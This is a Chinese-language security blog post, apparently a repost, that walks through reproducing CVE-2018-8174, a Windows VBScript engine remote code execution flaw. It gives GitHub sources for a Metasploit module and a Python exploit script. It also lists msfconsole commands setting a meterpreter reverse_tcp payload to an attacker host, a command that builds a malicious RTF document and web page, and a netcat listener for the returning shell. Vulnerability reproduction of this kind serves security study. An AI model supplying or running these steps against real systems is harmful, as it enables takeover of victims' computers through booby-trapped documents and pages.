Windows VBScript Engine 代码执行漏洞利用

漏洞描述CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Of...

漏洞描述

CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,将其命名为CVE-2018-8174。

漏洞编号

CVE-2018-8174

漏洞利用

MSF模块

下载地址:git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

使用方法:

1.  复制CVE-2018-8174.rb 到 /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

2.  复制CVE-2018-8174.rtf 到 /usr/share/metasploit-framework/data/exploits/

3.  启动msfconsole

use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.107.128
set lhost 192.168.107.128
exploit

2.png

exploit之后,msf会在/root/.msf4/local/目录下生成一个msf.rtf文档,仅支持Microsoft Office 32位;且开启一个8080端口的Web服务,根目录会自动生成index.html页面,仅支持IE浏览器32位,msf.rtf文档和index.html都内含有恶意的VBScript代码。

3.png

Office恶意文档测试,发现不能弹回shell。

4.png

5.png

测试Web服务恶意index.html页面(须使用IE 32位来进行测试),发现也是不能够弹回shell。

6.png

1.  使用msf模块没有复现成功,而且CVE-2018-8174-msf模块的作者也说了,模块使用当中可能遇到各种问题,鄙人在复现的时候发现也不能弹回shell,但是msf回显"CVE-2018-8174 - Delivering Exploit"基本可以判定漏洞是存在的。

2.  所以下面我使用exp脚本手工去做复现。

Exp脚本

下载地址:git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git

使用方法:

1.  python CVE-2018-8174.py -u http://192.168.1.108/exploit.html -o exp.rtf -i 192.168.1.100 -p 6666
2.  把exploit放在Web服务器上
3.  Nc监听6666端口(192.168.1.100)
4.  靶机使用IE 32位访问http://192.168.1.108/exploit.html

7.png

分析文章

[0] http://www.4hou.com/vulnerable/11441.html

[1] https://www.anquanke.com/post/id/117790

文章版权归原作者所有,转载需取得作者本人同意 并注明出处:https://secfree.com/article-897.html

联系我们

邮件:[email protected]